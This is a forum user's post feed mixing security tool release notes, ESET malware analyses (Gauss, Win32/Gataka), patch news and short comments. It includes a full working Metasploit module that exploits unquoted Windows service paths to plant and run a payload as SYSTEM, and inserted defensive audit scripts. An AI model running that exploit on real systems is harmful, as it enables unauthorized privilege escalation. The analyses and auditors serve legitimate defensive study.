Everything posted by Nytro
-
It contains 2 (badly) encrypted executables, and I don't see why it should. Ban; further explanations from another account if really needed.
-
[h=1]UPDATE: ThreadFix 1.0 beta 21![/h]
“ThreadFix is a software vulnerability aggregation and management system that helps organizations aggregate vulnerability data, generate virtual patches, and interact with software defect tracking systems. It imports the results from dynamic, static and manual testing to provide a centralized view of software security defects across development teams and applications. The system allows companies to correlate testing results and streamline software remediation efforts by simplifying feeds to software issue trackers. By auto generating application firewall rules, this tool allows organizations to continue remediation work uninterrupted.”

[h=2]Changes made to ThreadFix:[/h]
- Defect Tracker and Remote Provider credentials are now encrypted before being saved in the database.
- An IBM Rational AppScan Source Edition alpha importer is now included.
- A few changes have been made to ease the development of a custom Defect Tracker solution. Now users can add a database entry and drop a JAR in the ThreadFix lib to include custom Defect Tracker code.
- CWE names have been updated to stay current with the May 2012 2.2 release of the standard.
- Veracode and Qualys now import all of the scans in an application’s history instead of just the first one.
- Veracode vulnerabilities that were marked as false positives will now import to ThreadFix as false positives.
- A few Nessus vulnerability types have been added, but most Nessus findings will still not import to ThreadFix.
- All tables that display vulnerability or finding information have been moved to an asynchronous loading method to improve performance and memory usage.
- The queue for scans now behaves serially to enforce scan ordering.
- Several bugs have been fixed and small changes have been made to the UI.

[h=3]Download ThreadFix:[/h]
ThreadFix 1.0 Beta 21 – ThreadFix_1_0_beta21.zip

Source: ThreadFix 1.0 beta 21! — PenTestIT
-
It will be later, not in September; I'll call that bum Andrew today to check, since we have several things to discuss.
-
It has started, come in.
-
[h=1]UPDATE: NetworkMiner 1.4![/h]
August 16, 2012 - 3:33 pm By Mayuresh

“NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows. NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files. NetworkMiner collects data (such as forensic evidence) about hosts on the network rather than to collect data regarding the traffic on the network. The main user interface view is host centric (information grouped per host) rather than packet centric (information showed as a list of packets/frames).”

[h=2]Official change log for NetworkMiner 1.4:[/h]
- DhcpPacketHandler.cs: DHCP option data is now extracted to the parameters tab. Thanks to Paul Cockayne for the idea.
- IPv4Packet.cs: Fragmented IPv4 packets are now properly reassembled to full IP packets with payload.
- IEC_60870-5-104Packet.cs: Implemented the SCADA protocol IEC 60870-5-104. Thanks to Aivar Liimets from Martem for his great support on this one!
- PacketHandler.cs: Added proper timestamps to detected anomaly events and improved ARP poisoning reporting to anomalies tab.
- NetworkMinerForm.cs: Verification of file extension is completely removed. Files with any extension can now be loaded, as long as they are valid libpcap files.
- NetworkMinerForm.cs: Added “Clear GUI” button to Tools menu.
- NetworkMinerForm.cs: Added option to show/hide cookies, NTLM challenge-responses as well as the ability to mask passwords in credentials tab.

According to us, the highlight of this release is the addition of the SCADA protocol!

[h=3]Download NetworkMiner:[/h]
NetworkMiner 1.4 – NetworkMiner_1-4.zip/NetworkMiner_1-4_source.zip

Source: NetworkMiner version 1.4! — PenTestIT
-
[Hakin9]Security Exploiting Adobe Flash Player
Nytro replied to Usr6's topic in Tutorials in English
Can you upload it somewhere else? Too many "Download" buttons on that piece of junk. I'll look tonight at what's going on with the image.
-
[h=1]Interconnection of Gauss with Stuxnet, Duqu & Flame[/h]
by Eugene Rodionov, Malware Researcher, August 15, 2012 at 12:48 pm

Although Gauss shares some features with Stuxnet and Flame there is some evidence that this is another kind of malware rather than one based on either the Stuxnet or Flame framework. This conjecture is based on the binary analysis of the modules of Gauss and below we will present several arguments supporting this idea.

Last week, reports of a new malware named Gauss emerged, a complex threat that has attracted a lot of media attention due to its links to Stuxnet and Flame and its geographical distribution. Since ESET has added detection for this threat, we are seeing geographical distribution of detection reports similar to those detailed by Kaspersky. The countries with the biggest impact are, in order, Lebanon, Israel and Palestine. In this blog post, we analyze the connections and similarities in programming between Stuxnet, Duqu and Flame.

The first thing that one can notice while analyzing Gauss is the abundance of object-oriented structures that makes it difficult to comprehend the malware functionality. The most prominent examples of malware that employ an object-oriented approach are Stuxnet, Duqu and Flame. Due to the complex logic of these threats, using object oriented programming is a reasonable way to efficiently implement their functionality. Stuxnet, Duqu and Flame utilize specific frameworks that are shown on the figure below:

Figure 1 – Stuxnet and Flame frameworks

The complexity of implementation of Gauss is less than that of Flame, for instance. Even if you consider, for example, the size of the main module of Gauss (wmiqry32.dll), we can see that roughly 30% of the size of its code section is devoted to standard library routines, as shown on the diagram below:

Figure 2 – Gauss main module layout

For Flame this number is several times lower. If we arrange these threats according to their complexity, we get the following picture (Gauss’s encrypted payload isn’t considered since we aren’t aware of its content):

Figure 3 – The threats arranged according to their complexity

In tables 1 and 2 you can see the results of a comparison of several modules of Gauss with Stuxnet and Flame. These data are obtained with the BinDiff plugin for the IDA Pro disassembler, which allows us to estimate how similar two modules are to each other.

Table 1 – Similarity of Gauss modules to Stuxnet
Table 2 – Similarity of Gauss modules to Flame

From the data contained in the tables it may be concluded that Gauss is even closer to Stuxnet than to Flame. These data were also confirmed during manual analysis of the malware. For instance, we found the same structures handling string objects, memory buffers, streams and other elements in both Stuxnet and Gauss, whereas Flame utilized other structures to work with such elements. Based on the binary analysis the only thing that Gauss shares with Flame is the way it encrypts the strings inside the binary module. But the decryption algorithms implemented in the malware are also rather different. In the figures below the string decryption algorithms of Gauss and Flame are presented:

Figure 4 – Gauss String Decryption Algorithm
Figure 5 – Flame String Decryption Algorithm

Other features of the malware such as injection technique, configuration information storage, and so on are also different. Stuxnet and Flame employ rather complex injection mechanisms that allow them to bypass security software. They create the illusion of a legally loaded module to bypass HIPS-like systems. Unlike them, Gauss utilizes a rather simple and straightforward injection technique. It merely allocates a memory buffer in the target process address space and copies the path of the module to inject into it:

Figure 6 – Gauss injection technique

Then it creates a remote thread by calling the CreateRemoteThread API routine that executes only the routine LoadLibraryW, as shown in the self-explanatory figure below:

Figure 7 – Decompilation of the code injecting a module

Another differentiator is that Flame implements quite complex configuration information storage as described in one of our blog posts: “Flame: in-depth code analysis of mssecmgr.ocx”. The configuration information of Gauss has nothing in common with that of Flame and is stored in the registry value TimeStampForUI of the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability key as binary data and is easily parsed.

In our previous blog post we wrote about reconstructing the Flame framework as a composition of objects implementing a specific interface:

Figure 8 – Flame Framework Architecture

We haven’t found this architecture in any of the Gauss modules we analyzed. The only Gauss module that contains a piece of code implementing objects similar, in a rudimentary way, to one found in Flame is winshell.ocx, but there is no implementation of the framework comparable to figure 6.

As a result it may be concluded that Gauss is another standalone kind of malware, although it is quite possible that its developers are somehow connected with the developers of Stuxnet and Flame. It borrows some features from these other malware but it may not be classified as something that is based on either a Stuxnet or Flame framework.

Eugene Rodionov, Malware Researcher

Source: Interconnection of Gauss Malware with Stuxnet, Duqu & Flame | ESET ThreatBlog
-
Vulnerability Summary for the Week of August 6, 2012
Nytro replied to Nytro's topic in Security news
More information from Microsoft: Microsoft Security Bulletin Summary for August 2012
-
Yes, informative; I'll watch the last one too when I have time. I really learned a lot of things...
-
Windows Service Trusted Path Privilege Escalation
Authored by sinn3r | Site metasploit.com
Posted Aug 15, 2012

This Metasploit module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. Take this file path as example: C:\program files\hello.exe; The Windows API will try to interpret this as two possible paths: C:\program.exe, and C:\program files\hello.exe, and then execute all of them. To some software developers, this is an unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalate privileges if run as SYSTEM. Some softwares such as OpenVPN 2.1.1, or OpenSSH Server 5, etc... all have the same problem.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'msf/core/post/common'
require 'msf/core/post/windows/services'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File
  include Post::Windows::WindowsServices

  def initialize(info={})
    super( update_info( info,
      'Name'           => 'Windows Service Trusted Path Privilege Escalation',
      'Description'    => %q{
        This module exploits a logic flaw due to how the lpApplicationName parameter
        is handled. When the lpApplicationName contains a space, the file name is
        ambiguous. Take this file path as example: C:\program files\hello.exe; The
        Windows API will try to interpret this as two possible paths: C:\program.exe,
        and C:\program files\hello.exe, and then execute all of them. To some software
        developers, this is an unexpected behavior, which becomes a security problem if
        an attacker is able to place a malicious executable in one of these unexpected
        paths, sometimes escalate privileges if run as SYSTEM. Some softwares such as
        OpenVPN 2.1.1, or OpenSSH Server 5, etc... all have the same problem.
      },
      'References'     =>
        [
          ['URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx']
        ],
      'DisclosureDate' => "Oct 25 2001",
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'Platform'       => [ 'win'],
      'Targets'        => [ ['Windows', {}] ],
      'SessionTypes'   => [ "shell", "meterpreter" ],
      'DefaultTarget'  => 0,
      # Migrate away, in case the service dies (can kill access)
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        }
    ))
  end

  def check
    if enum_vuln_services.empty?
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Vulnerable
    end
  end

  def enum_vuln_services(quick=false)
    vuln_services = []

    service_list.each do |name|
      info = service_info(name)

      # Sometimes there's a null byte at the end of the string,
      # and that can break the regex -- annoying.
      cmd = info['Command'].strip

      # Check path:
      # - Filter out paths that begin with a quote
      # - Filter out paths that don't have a space
      next if cmd !~ /^[a-z]\:.+\.exe$/i
      next if not cmd.split("\\").map {|p| true if p =~ / /}.include?(true)

      # Filter out services that aren't launched as SYSTEM
      next if info['Credentials'] !~ /LocalSystem/

      vprint_status("Found vulnerable service: #{name} - #{cmd} (#{info['Credentials']})")
      vuln_services << [name, cmd]

      # This process can be pretty damn slow.
      # Allow the user to just find one, and get the hell out.
      break if not vuln_services.empty? and quick
    end

    return vuln_services
  end

  def exploit
    #
    # Exploit the first service found
    #
    print_status("Finding a vulnerable service...")
    svrs = enum_vuln_services(true)

    if svrs.empty?
      print_error("No service found with trusted path issues")
      return
    end

    svr_name = svrs.first[0]
    fpath    = svrs.first[1]
    exe_path = "#{fpath.split(' ')[0]}.exe"

    print_status("Placing #{exe_path} as #{svr_name}")

    #
    # Drop the malicious executable into the path
    #
    exe = generate_payload_exe
    print_status("Writing #{exe.length.to_s} bytes to #{exe_path}...")
    begin
      write_file(exe_path, exe)
    rescue Rex::Post::Meterpreter::RequestError => e
      # Can't write the file, can't go on
      print_error(e.message)
      return
    end

    #
    # Run the service, let the Windows API do the rest
    #
    print_status("Launching service #{svr_name}...")
    tried = false
    begin
      status = service_start(svr_name)
      raise RuntimeError, status if status != 0
    rescue RuntimeError => s
      if tried
        print_error("Unable to start #{svr_name}")
        return
      else
        tried = true
      end

      case s.message
      when 1
        # Service already started, restart again
        service_stop(svr_name)
        retry
      when 2
        # Service disabled, enable it
        service_change_startup(svr_name, 'manual')
        retry
      end
    end

    #
    # "Nothing ever happened, we swears it on the Precious!"
    #
    print_status("Deleting #{exe_path}")
    begin
      cmd_exec("cmd /c del \"#{exe_path}\"")
    rescue ::Exception => e
      print_error("Unable to remove #{exe_path}: #{e.message}")
    end
  end
end
```

Source: Windows Service Trusted Path Privilege Escalation ≈ Packet Storm
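A defender-side audit of the same condition the module above selects on, as an added example (not the module's or Metasploit's code): it walks the interpretation sequence CreateProcess applies to an unquoted image path containing spaces and flags which services run as LocalSystem. The service records are constructed; taking the image path to end at the first .exe token is an assumption carried over from the module's own filter.

```python
import re

# Constructed sample records in the shape of Win32_Service / `sc qc` output:
# (service name, image path as stored in the registry, account the service runs as).
SAMPLE_SERVICES = [
    ("VendorSvc", r"C:\Program Files\Vendor App\svc.exe", "LocalSystem"),
    ("QuotedSvc", r'"C:\Program Files\Vendor App\svc.exe" -config x', "LocalSystem"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "LocalSystem"),
    ("UserSvc", r"C:\Program Files\Other App\agent.exe -k", r"NT AUTHORITY\LocalService"),
]


def executable_part(cmd):
    """Return the unquoted executable path CreateProcess has to guess at, or None
    when the path is quoted or no token ends in .exe (assumption: as in the module
    above, the image path is taken to end at the first .exe token)."""
    cmd = cmd.rstrip("\x00").strip()   # the module strips a trailing null byte too
    if cmd.startswith('"'):
        return None                    # a quoted path is unambiguous
    tokens = cmd.split(" ")
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(".exe"):
            return " ".join(tokens[:i + 1])
    return None


def search_order(path):
    """Interpretations CreateProcess tries, in order, for an unquoted path with
    spaces: each space-delimited prefix, with .exe appended when the candidate
    has no extension (the MSDN behaviour the module's reference describes)."""
    tokens = path.split(" ")
    tried = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        last_component = prefix.rsplit("\\", 1)[-1]
        tried.append(prefix if "." in last_component else prefix + ".exe")
    return tried


def audit_services(records):
    """Report services whose image path is unquoted, absolute and contains a space;
    runs_as_system marks the ones the module would pick (LocalSystem)."""
    findings = []
    for name, cmd, account in records:
        exe = executable_part(cmd)
        if exe is None or " " not in exe:
            continue
        if not re.match(r"^[a-z]:\\", exe, re.I):   # same drive-letter check as the module
            continue
        findings.append({
            "service": name,
            "path": exe,
            "search_order": search_order(exe),
            "runs_as_system": account == "LocalSystem",
            # Quoting the image path is the fix: only the real file is ever tried.
            "fixed_command": cmd.replace(exe, '"%s"' % exe, 1),
        })
    return findings


if __name__ == "__main__":
    for f in audit_services(SAMPLE_SERVICES):
        tag = "SYSTEM" if f["runs_as_system"] else "non-SYSTEM"
        print(f["service"], tag, f["search_order"])
```

Every intermediate entry in search_order names a location whose parent directory ACL should deny write access to standard users; quoting the ImagePath, as fixed_command shows, removes the ambiguity entirely.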
-
Oh yes, I only knew about Metasploitable... Thanks.
-
MySQL Tutorial

Abstract: This is the MySQL Tutorial from the MySQL 5.1 Reference Manual. Document generated on: 2012-08-04 (revision: 31551)

Table of Contents
Preface and Legal Notices
1. Tutorial
2. Connecting to and Disconnecting from the Server
3. Entering Queries
4. Creating and Using a Database
4.1. Creating and Selecting a Database
4.2. Creating a Table
4.3. Loading Data into a Table
4.4. Retrieving Information from a Table
4.4.1. Selecting All Data
4.4.2. Selecting Particular Rows
4.4.3. Selecting Particular Columns
4.4.4. Sorting Rows
4.4.5. Date Calculations
4.4.6. Working with NULL Values
4.4.7. Pattern Matching
4.4.8. Counting Rows
4.4.9. Using More Than one Table
5. Getting Information About Databases and Tables
6. Using mysql in Batch Mode
7. Examples of Common Queries
7.1. The Maximum Value for a Column
7.2. The Row Holding the Maximum of a Certain Column
7.3. Maximum of Column per Group
7.4. The Rows Holding the Group-wise Maximum of a Certain Column
7.5. Using User-Defined Variables
7.6. Using Foreign Keys
7.7. Searching on Two Keys
7.8. Calculating Visits Per Day
7.9. Using AUTO_INCREMENT
8. Using MySQL with Apache

Download: http://downloads.mysql.com/docs/mysql-tutorial-excerpt-5.1-en.pdf
-
[h=2]Adobe Officially Kills New Flash Installations On Android[/h]
hypnosec writes "Adobe has announced that it will be making the Flash Player for Android unavailable for new devices and users from August 15 in continuation of its plan to discontinue development of Flash Player for mobile browsers. The company announced its decision through a blog post and further said that only those users who have already installed the Flash Player on their devices will be receiving any future updates. To ensure that this is the case, Adobe is going to make configuration changes on its Google Play Flash Player page."

Source: Adobe Officially Kills New Flash Installations On Android - Slashdot
-
[h=1]exploit exercises : Learn exploiting fast[/h]
August 15, 2012 - 8:16 pm By Black

exploit exercises provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering.

[h=2]There are three main levels in exploit exercises[/h]
- Nebula – Simple and intermediate challenges
- Protostar – Basic memory corruption issues
- Fusion – Advanced level

Nebula covers a variety of simple and intermediate challenges that cover Linux privilege escalation, common scripting language issues, and file system race conditions.

Protostar introduces basic memory corruption issues such as buffer overflows, format strings and heap exploitation on an “old-style” Linux system that does not have any form of modern exploit mitigation systems enabled.

Fusion continues the memory corruption, format strings and heap exploitation but this time focusing on more advanced scenarios and modern protection systems. Fusion is the place to start if you are familiar with Linux exploitation and wish to learn more about exploitation prevention systems.

Each of them has levels starting from 0. It is up to us how to crack them.

[h=3]Click here to learn more or download exploit exercises[/h]
Source: exploit exercises : Learn exploiting fast — PenTestIT
-
[h=2]GCC Switches From C to C++[/h]
According to a post on the GNU Compiler Collection list, GCC is now built as a C++ program by default. This is the fruition of much effort, and the goal now is to clean up the GCC internals that are reportedly pretty type-unsafe by rewriting them using C++ classes and templates.

For details, follow the links:
- Diego Novillo - Merging the cxx-conversion branch into trunk
- GCC Moving To Use C++ Instead of C - Slashdot
- Mark Mitchell - Using C++ in GCC is OK
- cxx-conversion - GCC Wiki

Source: GCC Switches From C to C++ - Slashdot
-
[h=1]Win32/Gataka banking Trojan – Detailed analysis[/h]by Jean-Ian Boutin Malware Researcher August 14, 2012 at 5:52 am Win32/Gataka is an information-stealing banking Trojan that can read all of your web traffic and alter the balance displayed on your online banking page to hide fraudulent transfers. It exhibits a modular architecture similar to that of SpyEye, where plugins are required to achieve most of the malware functionality. In our previous blog post, we gave an overview of the botnet’s capabilities and some of its recent campaigns. In this second blog post, we will look in more detail at two of the main components of Win32/Gataka: the Webinject and Interceptor plugins. As also shown in the previous blog post, here is the general architecture that characterizes Win32/Gataka. Please refer to the first blog post for a description of each plugin’s functionalities. [h=2]Interceptor Plugin[/h] This plugin creates a proxy server on the local machine so that all outbound and inbound network traffic can be examined. In the case of HTTPS traffic, fake certificates, embedded in encrypted form in the plugin resources, are exchanged between the client and the proxy server. The browser certificate checking functions are also patched in an attempt to hide from the user the fact that fake certificates are used. This plugin must be used in conjunction with other plugins to allow the botnet operator to steal personal information from the user. For instance, the Webinject plugin will set specific filters through the NextGenFixer plugin, enabling web traffic injection and modification when the user visits specific web pages. The way the interceptor module works is shown in the next figure: 1. As soon as the user launches a browser, the malware will inject its malicious payload into it, then patch the certificate checking functionality and also hook selected API functions such as connect in order to intercept all web communications. 2. 
In our example, the user tries to connect to a bank server which is targeted by a webinject configuration file downloaded by the malware. When the browser uses the connect API to connect to the bank server, the call will be intercepted by the malware, thanks to the installed hook. The API hooking mechanism is quite standard: it will put a jump to the malware code at the beginning of the call so that all calls to the API are redirected. The function’s first few patched bytes are saved in a separate buffer so that the malware can call the original API when needed. 3. The malware will then connect to the bank server using the information provided by the user, acting as a proxy between the two. 4. The bank communicates back to the malware. 5. The malware will relay this information to the user. It is interesting to note here that all of this is possible without the user realizing what is happening because the malware uses fake certificates to communicate with the client’s browser. Since the certificate checking functions for the browser are patched, the browser believes the transaction to be a legitimate SSL/TLS session. The fake certificates are embedded in the interceptor plugin resources: Both certificates are invalid: the one on the left has expired and the one on the right was not issued by a trusted certificate authority (CA). The certificate verification routines used by the following browsers can be patched by Win32/Gataka: Firefox Internet Explorer Netscape Navigator Opera Maxthon There are some strings referring to Chrome, but it seems that this browser is not yet supported. It is interesting to note that Maxthon, a lesser-known browser but available on several platforms, is supported, but not Chrome. This becomes understandable once we know that the same certificate verification routine is patched for both Maxthon and Internet Explorer. All Firefox versions are supported, even the latest one (i.e. 14.0.1). 
This version of Firefox was released on July 17, 2012 and the interceptor plugin version supporting this release was compiled on July 19, 2012. This shows that the malware is still being actively developed. We will now look further at the way Internet Explorer’s certificate verification routine is patched. The routine responsible for verifying the certificate validity is WinVerifyTrust() in wintrust.dll. According to MSDN documentation relating to WinVerifyTrust(): If the trust provider verifies that the subject is trusted for the specified action, the return value is zero. Thus, in order to patch this function, the interceptor plugin finds the routine’s start address and patches the last bytes so that it always returns zero. 6. Once the malware has performed these steps, it can intercept all communications between the user and his or her bank in clear format, even if SSL/TLS is used. Decryption of the SSL/TLS traffic is made possible thanks to the fake certificates. If the bank URL is present in the webinject configuration file, the webinject plugin will register callback with the Interceptor plugin in order to inject or modify content in the web pages the user is seeing, even if it is using HTTPS connection. The injection content may take the form of additional fields on a specific web page requiring extra personal information. The content modification may be effected through scripts that will alter an account balance in order to hide an automatic fraudulent transfer. [h=2]Webinject Plugin[/h] As seen in the previous Gataka blog post, attacks against financial institutions are performed through HTTP injections. These injections are configurable and are sent to the client following a predefined format. For each target URL, it is possible to specify where in the HTML page the malicious content should be injected. Of course, this needs customization for each targeted institution. 
The Webinject plugin is responsible for reading the webinject configuration file and injects the content into the targeted webpages. One really interesting observation is that the format of the webinject file used by Win32/Gataka is very similar to the one used by SpyEye. This is probably to leverage the webinject programmer base already used to write injects for SpyEye and Zeus. The following screenshot shows a Win32/Gataka file and a SpyEye webinject file to illustrate the striking similarities. The tags used to determine where the scripts should be inserted are identical for Gataka and SpyEye. The only difference we see is the usage of the end_url in the case of Win32/Gataka. Having a compatible format allows the cybercriminal to easily migrate from one malware to another, or to have bots infected with different malware and yet still be able to use the same HTTP inject configuration file. The configuration files used for injecting malicious content into webpages visited are kept in an internal database. The database is encrypted using 3DES and is located in the following location. The password to decrypt the database is kept in the file and appears as cfvsq ckj;ysq GfhjKm. Interestingly, when typed on a Cyrillic keyboard layout, this string is rendered as ????? ??????? ??????. This roughly translates to “the most complex password”, a personal touch from the malware author. Once decrypted, the file is XML-based and contains Base64-encoded data: The HTTP injection configuration files are compressed and kept within the <injdata>. During Webinject plugin initialization, the database file is read and the filters are put in place to allow successful injections. [h=3]Example Campaign[/h] One campaign we monitored was using an advanced type of webinject that automatically sends user information typed in by a user to a predefined URL. 
The webinject file downloaded from the C&C server shown below contains a link to a script on a remote server: When the user visits the targeted webpage, the script above is injected and causes the webpage to download an additional script from a server controlled by the botnet operator. This script is then inserted into the target page in order to steal personal information from the user. In this example, the downloaded script will show a form to the user asking for personal information as soon as he logs in the targeted web page. In order to entice the infected user into entering his personal information, he is shown a message stating that his account was locked and that personal information is needed in order to regain control of the account. The following screenshot shows the kind of information the criminals are after. The following countries had their own personalized messages: United States Canada United Kingdom Australia Spain France Germany Once the user has entered all the information required, a quick check is made by the injected JavaScript to make sure that the information entered is valid. As an example, Luhn’s algorithm is used to make sure that a valid credit card number has been entered. The data is then sent back to the control panel through a link and password provided in the script previously downloaded: It is very interesting that the link and, more important, the password are stored in clear text in the downloaded JavaScript. The harvested information is sent through a GET request to the C&C. The ability to save user information using a webinject file like the one shown above has the great advantage of being malware independent. This means that the same webinject file can be used to gather personal information from users infected with different strains of banking Trojan. It can be very useful if a bot master is managing computers infected with different malware such as SpyEye or Win32/Gataka. 
In summary, Win32/Gataka employs interesting techniques in order to steal valuable information from an infected user. Through API hooking, the interceptor plugin is able to view all communications coming in and out of the computer. The Webinject plugin can in turn access this information and modify or inject new content in the web sites the user is seeing. For instance, this allows the botmaster to inject advanced scripts attempting to automatically empty a user's bank account or to harvest private information.

In one campaign we have followed, Win32/Gataka botnet operators make use of an advanced webinject configuration that can be used by different types of malware. These advanced scripts are a good example of the ways in which malware writers specialize. People specializing in writing web inject configuration files are able to sell their work to a larger customer base and are not tied to a particular type of malware. By allowing the script itself to communicate with the control panel, it is easier to implement compatibility with a wide range of information-stealing malware.

ESET detects this threat as “Win32/Gataka.B trojan”.

Special thanks to my colleague Axel Souchet who provided help with this analysis.

Sursa: Win32/Gataka banking Trojan – Detailed analysis | ESET ThreatBlog
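The campaign above validates card numbers with Luhn's algorithm in the injected script and then exfiltrates the form data in a plain GET request. The same check works on the defender's side: the Python below (an added example written for this page, not code from ESET's analysis or from the malware) scans outbound GET query strings for Luhn-valid primary account numbers, which is one way to flag that exfiltration pattern in proxy logs. The host, path and parameter names in the sample requests are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample requests modelled on the pattern described above:
# harvested form data travelling to a C&C "gate" inside a GET query string.
# Host, path and parameter names are invented placeholders, not real IoCs.
SAMPLE_REQUESTS = [
    "http://cc.example.invalid/gate.php?id=bot1&cc=4111111111111111&exp=1215&cvv=123",
    "http://cc.example.invalid/gate.php?id=bot2&cc=4111111111111112",  # fails Luhn
    "http://shop.example.invalid/search?q=laptop&page=2",             # benign
]


def luhn_valid(digits: str) -> bool:
    """Luhn checksum, the same test the injected script applies to card numbers.

    Only 13 to 19 digit strings are considered; anything else is not a PAN.
    """
    if not digits.isdigit() or not 13 <= len(digits) <= 19:
        return False
    total = 0
    # Walk right to left; double every second digit and fold 10..18 into 1..9.
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_pans(request_url: str) -> list:
    """Return (parameter, value) pairs in the query string that pass Luhn."""
    hits = []
    for name, value in parse_qsl(urlsplit(request_url).query, keep_blank_values=True):
        candidate = re.sub(r"[ -]", "", value)  # tolerate "4111 1111 ..." input
        if luhn_valid(candidate):
            hits.append((name, candidate))
    return hits


def flag_requests(urls) -> dict:
    """Map each request URL that carries a Luhn-valid number to its hits."""
    flagged = {}
    for url in urls:
        hits = find_pans(url)
        if hits:
            flagged[url] = hits
    return flagged
```

In a real deployment the URLs would come from proxy or IDS logs rather than the inline list, and a hit on a host outside the allowed payment processors is the signal worth alerting on.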
-
Vulnerability Summary for the Week of August 6, 2012
Nytro replied to Nytro's topic in Stiri securitate
The Microsoft updates have arrived too: http://i49.tinypic.com/2r3ch1j.png
-
And still, how do you get hold of one, a valid one...?
-
It's rubbish to put up "Hacked by Vasile"; nobody cares and it impresses nobody. If you got access, you could have shown that, instead of making a mess of it and dropping a crappy message there. Never mind, we hope you change in the future and understand what "pathetic" means. I hope you're not expecting too much praise for this "feat"...
-
[h=2]Critical Security Fixes from Adobe, Microsoft[/h]
Adobe and Microsoft each issued security updates today to fix critical vulnerabilities in their software. Adobe’s fixes include a patch for a Flash Player flaw that is actively being exploited to break into Windows computers. Microsoft’s Patch Tuesday release includes nine patch bundles — more than half of them rated critical — addressing at least 27 security holes in Windows and related software.

The most pressing of the updates Adobe released today is the Flash Player patch, which fixes a critical flaw (CVE-2012-1535) in the ubiquitous media player software. Adobe says there are reports that the vulnerability is being exploited in the wild in limited targeted attacks, distributed through a malicious Microsoft Word document. The exploit targets the ActiveX version of Flash Player for Internet Explorer on Windows. Nevertheless, the underlying vulnerability being targeted exists in Windows, Mac and Linux versions of the software.

Windows and Mac users can grab the latest version (v. 11.3.300.271) via the Flash Player download center. Be sure to uncheck the “free” software scans that Adobe loves to bundle with updates, such as McAfee‘s obnoxious Security Scan Plus, if you don’t want it. Linux users should update to v. 11.2.202.238, and Chrome users want to be at v. 11.3.330.270 (normally Chrome auto-updates Flash, but recently it’s been sluggish to do so: my Chrome installation is still at v. 11.3.31.225). I will update this post in a bit with the direct links to the Flash Player downloads.

Adobe also pushed out a new version (v. 10.1.4) of Adobe Acrobat and Reader that corrects at least 20 distinct security vulnerabilities in Windows and Mac versions of these products. Windows users can grab the latest update from this link, and Mac users from here. Those looking for links to Adobe Acrobat updates and support for older versions of Reader should check the advisory that the company issued today for more information.
In addition, Adobe released an update that fixes at least five critical flaws in Windows and Mac versions of its Shockwave Player software. If you have this program installed, update it. If not, forget about this patch, as you probably don’t need the software. The latest version is Shockwave Player 11.6.6.636 and is available via this link.

At the top of the heap of security updates that Microsoft released today is MS12-060, which fixes a vulnerability in Microsoft Office that is already being exploited in the wild. Other high-priority updates from Redmond include a patch for a flaw in the Remote Administration protocol of Windows networking, and an Internet Explorer update that fixes two security holes. More information on the Windows patches is available from Microsoft’s Security Response Center and from Qualys. Microsoft patches are available through Windows Update or Automatic Update.

As usual, please leave a note in the comments section if you experience problems applying any of these updates.

Sursa: Critical Security Fixes from Adobe, Microsoft — Krebs on Security
-
What amazes me is that the original presentation at Blackhat was given by... a woman! Joanna Rutkowska. The idea is well thought out, but it would be rather hard to exploit.
-
Linux kernel poll. If you have nothing better to do and you're into Linux/kernel: http://www.linuxjournal.com/content/linux-kernel-poll